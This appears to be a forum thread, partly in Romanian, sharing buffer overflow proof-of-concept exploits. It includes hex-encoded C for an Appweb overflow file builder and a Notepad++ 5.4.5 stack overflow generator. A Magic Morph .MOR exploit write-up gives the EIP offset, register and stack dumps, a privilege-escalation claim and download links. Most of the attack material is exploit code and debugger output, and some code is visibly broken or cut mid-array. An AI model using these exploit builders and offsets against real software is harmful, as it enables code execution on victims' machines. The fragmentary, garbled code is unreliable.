0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x65, 0x5F, 0x61, 0x64, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x75, 0x69, 0x6E, 0x74, 0x38, 0x5F, 0x74, 0x20, 0x73, 0x68, 0x69, 0x74, 0x5B, 0x5D, 0x20, 0x3D, 0x7B, 0x20, 0x30, 0x78, 0x33, 0x43, 0x2C, 0x30, 0x78, 0x36, 0x39, 0x2C, 0x30, 0x78, 0x36, 0x44, 0x2C, 0x30, 0x78, 0x36, 0x37, 0x2C, 0x30, 0x78, 0x32, 0x30, 0x2C, 0x30, 0x78, 0x37, 0x33, 0x2C, 0x30, 0x78, 0x37, 0x32, 0x2C, 0x30, 0x78, 0x36, 0x33, 0x2C, 0x30, 0x78, 0x33, 0x44, 0x20, 0x7D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x73, 0x68, 0x69, 0x74, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x73, 0x68, 0x69, 0x74, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x34, 0x31, 0x2C, 0x20, 0x34, 0x36, 0x31, 0x36, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x34, 0x36, 0x31, 0x36, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x73, 0x65, 0x74, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x30, 0x78, 0x32, 0x32, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x62, 0x6F, 0x5F, 0x64, 0x79, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x5C, 0x5C, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x31, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x2C, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x73, 0x69, 0x7A, 0x65, 0x6F, 0x66, 0x28, 0x68, 0x74, 0x5F, 0x6D, 0x6C, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6D, 0x65, 0x6D, 0x63, 0x70, 0x79, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2B, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x2C, 0x20, 0x22, 0x3E, 0x22, 0x2C, 0x20, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2B, 0x3D, 0x20, 0x32, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x6D, 0x65, 0x6D, 0x42, 0x75, 0x66, 0x66, 0x65, 0x72, 0x2C, 0x20, 0x6F, 0x66, 0x66, 0x73, 0x65, 0x74, 0x20, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x77, 0x72, 0x69, 0x74, 0x65, 0x28, 0x22, 0x5C, 0x78, 0x30, 0x30, 0x22, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x31, 0x2C, 0x20, 0x66, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x46, 0x69, 0x6C, 0x65, 0x20, 0x44, 0x6F, 0x6E, 0x65, 0x21, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x6E, 0x74, 0x20, 0x6D, 0x61, 0x69, 0x6E, 0x28, 0x69, 0x6E, 0x74, 0x20, 0x61, 0x72, 0x67, 0x63, 0x2C, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x5D, 0x29, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x7B, 0x20, 0x20, 0x63, 0x68, 0x61, 0x72, 0x20, 0x2A, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x20, 0x3D, 0x20, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x31, 0x5D, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x73, 0x79, 0x73, 0x74, 0x65, 0x6D, 0x28, 0x22, 0x43, 0x4C, 0x53, 0x22, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x45, 0x6D, 0x62, 0x65, 0x64, 0x74, 0x68, 0x69, 0x73, 0x20, 0x41, 0x70, 0x70, 0x77, 0x65, 0x62, 0x20, 0x52, 0x65, 0x6D, 0x6F, 0x74, 0x65, 0x20, 0x53, 0x74, 0x61, 0x63, 0x6B, 0x20, 0x4F, 0x76, 0x65, 0x72, 0x66, 0x6C, 0x6F, 0x77, 0x20, 0x50, 0x4F, 0x43, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x41, 0x6C, 0x6C, 0x20, 0x43, 0x72, 0x65, 0x64, 0x69, 0x74, 0x73, 0x3A, 0x66, 0x6C, 0x30, 0x20, 0x66, 0x6C, 0x30, 0x77, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x66, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x73, 0x74, 0x64, 0x6F, 0x75, 0x74, 0x20, 0x2C, 0x20, 0x22, 0x3A, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3A, 0x5C, 0x6E, 0x22, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x69, 0x66, 0x28, 0x61, 0x72, 0x67, 0x63, 0x20, 0x3C, 0x20, 0x32, 0x29, 0x20, 0x7B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x70, 0x72, 0x69, 0x6E, 0x74, 0x66, 0x28, 0x22, 0x55, 0x73, 0x61, 0x67, 0x65, 0x20, 0x69, 0x73, 0x20, 0x25, 0x73, 0x20, 0x66, 0x69, 0x6C, 0x65, 0x6E, 0x61, 0x6D, 0x65, 0x2E, 0x68, 0x74, 0x6D, 0x6C, 0x5C, 0x6E, 0x22, 0x2C, 0x20, 0x61, 0x72, 0x67, 0x76, 0x5B, 0x30, 0x5D, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x65, 0x78, 0x69, 0x74, 0x28, 0x2D, 0x31, 0x29, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x46, 0x62, 0x75, 0x69, 0x6C, 0x64, 0x28, 0x66, 0x6E, 0x61, 0x6D, 0x65, 0x29, 0x3B, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x72, 0x65, 0x74, 0x75, 0x72, 0x6E, 0x20, 0x30, 0x3B, 0x20, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x7D, 0x20, 0x20, 0x0D, 0x0A, } ; size_t get_executable_path (char* buffer, size_t len) { char* path_end; if (readlink ("/proc/self/exe", buffer, len) <= 0) return -1; path_end = strrchr (buffer, '/'); if (path_end == NULL) return -1; ++path_end; *path_end = '\0'; return (size_t) (path_end - buffer); } #define STRING_SIZE 0xF4240 #define S 0x64 char b[sTRING_SIZE]; memset(b, 0x41, STRING_SIZE); FILE *f; f = fopen(fname, "wb"); int i; for(i = 0; i < S; i++) { fwrite(b, sizeof(char), STRING_SIZE, f); } fwrite(V, sizeof(char), strlen(V), f); checksum(b, STRING_SIZE); char c[100]; get_executable_path (c, 100); printf("FILE DONE !\n"); printf("path/location of the crafted file is: %s\n", c); fclose(f); } void args(int argc, char *argv[]) { int file; int a; if(a) while((a = getopt(argc, argv, "f")) != EOF) { switch(a) { case 'f': file = (int)optarg; break; default: exit(-1); } } } void Usage(char *argv[]) { printf("*************************************************\n"); printf("Notepad++ 5.4.5 Stack Buffer Overflow\n"); printf("Usage is:%s [option1] filename\n", argv[0]); printf("CREDITS:fl0 fl0w\n"); printf("This POC is PRIVATE\n"); printf("*************************************************\n"); } void Menu(char *argv[]) { fprintf(stderr, "\n" "\t-f FILE.c/cpp\n" "\n" , argv[0]); exit(-1); } int main(int argc, char *argv[]) { CLS(15); if(argc < 2) { Usage(argv); printf("Example:\n"); Menu(argv[0]); Usage(argv); } args(argc, argv); Buildfile(argv[2]); return 0; }
-
- 1
-
-
My new exploit . Pentru mai multe detalii privind debugging, am pus screenshoturi si altele http://rapidshare.com/files/279955517/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html http://www.2shared.com/file/7794630/5e98eb46/Portable_EM_Magic_Morph_195b_Buffer_Overflow.html http://www.turboupload.com/2y6snh3b5fad/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html Acest buffer overflow este 100% exploatabil rezultand in executie de cod pe un target capatand astfel drepturi de ADMIN pornind de la statusul de USER. Partea cea mai dificila este programarea shellcodului ,deoarece softul are probleme cand intampina anumite caractere speciale. 1.Trebuie identificate aceste caractere 2.Shellcode programat dupa conditiile de fata. 3.Exploit imbunatatit prin adaugarea de MULTI-TARGET'URI ,si Multiple shellcoduri. /************************************************* Magic Morph .MOR File Stack Buffer Overflow POC * By fl0 fl0w * ************************************************** /******************************************************************************************************** The EIP offset is at 312 bytes 0x138 HEX * After you compile and create the .MOR file ,edit it with HEX EDITOR and start counting from the start * of the file, and you'll have to rezult with 0x138 bytes * * I used a technique names "stack spray" to determine the offset. * * CPU REGISTERS * EAX 00000000 * ECX 33333333 * EDX 01492288 * EBX 00000001 * * ESP 0012EF7C ASCII "444bbbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa * ````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * XXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223 * EBP 0012F3CC ASCII "````````````````````````````````````````````````YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY * YYYYYYYYYYYYYYYYXXXXXXXXXXXXXXXXcccccccccccccccccccccccccccccccc2222222223333333333fffffAAAAww44444b * bbbbbbbbbbgggggggggggggggggbaaaaaaaaaaaaaaaaaaaaaaaaaa * * ESI 00F369B0 * EDI 00F369B0 * EIP 41414141 * * We control ECX, EIP witch is more than enought to copy what addresess you want in the memory. * So I go in OLLYDBG at the ESP register and right click ->follow in stack ,I observe that the corruption* starts at a much lower address. * This is what ESP points to: * ******************************************************************************************************** */ /************************ STACK * 0012EF7C 62343434 * 0012EF80 62626262 * 0012EF84 62626262 * 0012EF88 67676262 * 0012EF8C 67676767 * 0012EF90 67676767 * 0012EF94 67676767 * 0012EF98 62676767 * 0012EF9C 61616161 * 0012EFA0 61616161 * 0012EFA4 61616161 * 0012EFA8 61616161 * 0012EFAC 61616161 * 0012EFB0 61616161 * 0012EFB4 61616161 * 0012EFB8 61616161 * 0012EFBC 61616161 * 0012EFC0 61616161 * 0012EFC4 61616161 * 0012EFC8 61616161 * 0012EFCC 60606060 * 0012EFD0 60606060 * 0012EFD4 60606060 * 0012EFD8 60606060 * 0012EFDC 60606060 * 0012EFE0 60606060 * 0012EFE4 60606060 * 0012EFE8 60606060 * 0012EFF0 60606060 * 0012EFF4 60606060 * 0012EFF8 60606060 * 0012EFFC 59595959 * 0012F000 59595959 * 0012F004 59595959 * 0012F008 59595959 * 0012F00C 59595959 * ..................... * *********************** */ /************************************************* You can copy your shellcode starting from here : * 0012EC3C 63636363 * * 0x12EF80 = 1240960 ->NOT-> A * * 0x12EC3C = 1240124 ->NOT-> B * * A > B * A - B = 836 = 0x344 * So the stack gets corrupted a long way from ESP.* ************************************************* */ /************************************************* LOOK OF THE DUMP * 0012EE4C 63 63 63 63 cccc * 0012EE54 63 63 63 63 63 63 63 63 cccccccc * 0012EE5C 32 32 32 32 32 32 32 32 22222222 * 0012EE64 32 33 33 33 33 33 33 33 23333333 * 0012EE6C 33 33 33 66 66 66 66 66 333fffff * 0012EE74 41 41 41 41 77 77 34 34 AAAAww44 * 0012EE7C 34 34 34 62 62 62 62 62 444bbbbb * 0012EE84 62 62 62 62 62 62 67 67 bbbbbbgg * 0012EE8C 67 67 67 67 67 67 67 67 gggggggg * 0012EE94 67 67 67 67 67 67 67 62 gggggggb * 0012EE9C 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEA4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEAC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEB4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEBC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EEC4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EECC 60 60 60 60 60 60 60 60 ```````` * 0012EED4 60 60 60 60 60 60 60 60 ```````` * 0012EEDC 60 60 60 60 60 60 60 60 ```````` * 0012EEE4 60 60 60 60 60 60 60 60 ```````` * 0012EEEC 60 60 60 60 60 60 60 60 ```````` * 0012EEF4 60 60 60 60 60 60 60 60 ```````` * 0012EEFC 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF04 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF0C 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF14 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF1C 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF24 59 59 59 59 59 59 59 59 YYYYYYYY * 0012EF2C 58 58 58 58 58 58 58 58 XXXXXXXX * 0012EF34 58 58 58 58 58 58 58 58 XXXXXXXX * 0012EF3C 63 63 63 63 63 63 63 63 cccccccc * 0012EF44 63 63 63 63 63 63 63 63 cccccccc * 0012EF4C 63 63 63 63 63 63 63 63 cccccccc * 0012EF54 63 63 63 63 63 63 63 63 cccccccc * 0012EF5C 32 32 32 32 32 32 32 32 22222222 * 0012EF64 32 33 33 33 33 33 33 33 23333333 * 0012EF6C 33 33 33 66 66 66 66 66 333fffff * 0012EF74 41 41 41 41 77 77 34 34 AAAAww44 * 0012EF7C 34 34 34 62 62 62 62 62 444bbbbb * 0012EF84 62 62 62 62 62 62 67 67 bbbbbbgg * 0012EF8C 67 67 67 67 67 67 67 67 gggggggg * 0012EF94 67 67 67 67 67 67 67 62 gggggggb * 0012EF9C 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFA4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFAC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFB4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFBC 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFC4 61 61 61 61 61 61 61 61 aaaaaaaa * 0012EFCC 60 60 60 60 60 60 60 60 ```````` * 0012EFD4 60 60 60 60 60 60 60 60 ```````` * 0012EFDC 60 60 60 60 60 60 60 60 ```````` * 0012EFE4 60 60 60 60 60 60 60 60 ```````` * 0012EFEC 60 60 60 60 